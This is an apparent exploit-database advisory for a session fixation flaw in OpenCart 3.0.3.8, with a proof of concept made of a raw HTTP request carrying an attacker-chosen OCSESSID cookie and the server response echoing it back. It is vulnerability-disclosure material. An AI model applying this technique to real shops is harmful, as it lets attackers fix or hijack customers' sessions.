opencart 3.0.3.8 Exploit, Sessjion Injection

# Exploit Title: opencart 3.0.3.8 - Sessjion Injection
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/
# Version: 3.0.3.8
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Sessjion Fixation / injection

Session cookie "OCSESSID" is inproperly processed
Attacker can set any value cookie and server set this value
Becouse of that sesssion injection and session fixation vulnerability

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example

Modify cookie "OCSESSID" value:
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/opencart-3.0.3.8/
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------------------------------------------------------------------------------------------------
Server set atttacker value:

Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 15:16:06 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: PHP/8.0.11
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18944
[...]

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD